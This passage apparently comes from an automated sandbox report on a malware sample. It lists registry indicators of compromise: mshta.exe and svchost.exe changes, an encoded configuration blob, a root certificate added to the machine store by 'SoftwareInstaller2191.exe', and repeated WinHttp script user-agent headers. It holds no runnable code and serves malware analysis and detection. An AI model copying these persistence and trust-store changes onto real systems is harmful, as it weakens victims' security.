\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10" mshta.exe -
Modifies data under HKEY_USERS 8 IoCs
Processes:
svchost.exeFri2058e26838.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Control Panel\Buses svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 3c57653e01c7720424edb47d450dd49d134286d6db3e66aba46d34fdc48d541d692cb64941cd945d24ee786f470dd49d651ccd8eaa7822f3955902d3f5b9621de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d64cff5bd84a9343ea64d3e1b9d8d541de4ac743d04a1fb3e4581d71b230dd49d642df4bd842290162dc934fdc48d541de4ae743d04abf83c439eeb083469d4ad644f9bcfea1270bcd00834ccf1bd6c2fd095440b30cdfd3924dc8649733ce2a8501bc2bdec244bb4c06d19c4f2b96329d59f470804a1fb3c4088c6222d69d4aa644484bda97c23ec925800caf3b8611d97df026270a4f93824c08549763de2af571ec18984217bbec5016b89ade0311dd598440536f9ac6d12d5b40f3668a7f2085bf48fb27427e997434794a9fd387887c11b4860e3e62824 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\MY svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 Fri2058e26838.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" Fri2058e26838.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" Fri2058e26838.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" Fri2058e26838.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" Fri2058e26838.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\trust MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 19ba9a675dc3d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 9ad6c7705dc3d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 4719a0695dc3d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CRLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000033467c8d2b58f02c7dbe3e59f4b7c3d9e34694970f26f47098e48ff9fc94faf9dabfb060308b9b103545e3c05dc301eb6045fe07e2cb33b77214abd7a1a6aef5f7aa1baf386ba74b1bc559d7e0dac9d36e407c44797ca10e5a68 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{A8BC4664-7919-4273-867F-9561DEDE8F4D} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe -
Processes:
SoftwareInstaller2191.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A SoftwareInstaller2191.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 SoftwareInstaller2191.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 SoftwareInstaller2191.exe -
Script User-Agent 29 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 190 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 642 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 662 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 262 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 510 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 516 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 354 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 627 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 670 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 684 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 57 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 241 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 650 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 741 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 78 Mozilla/4.0 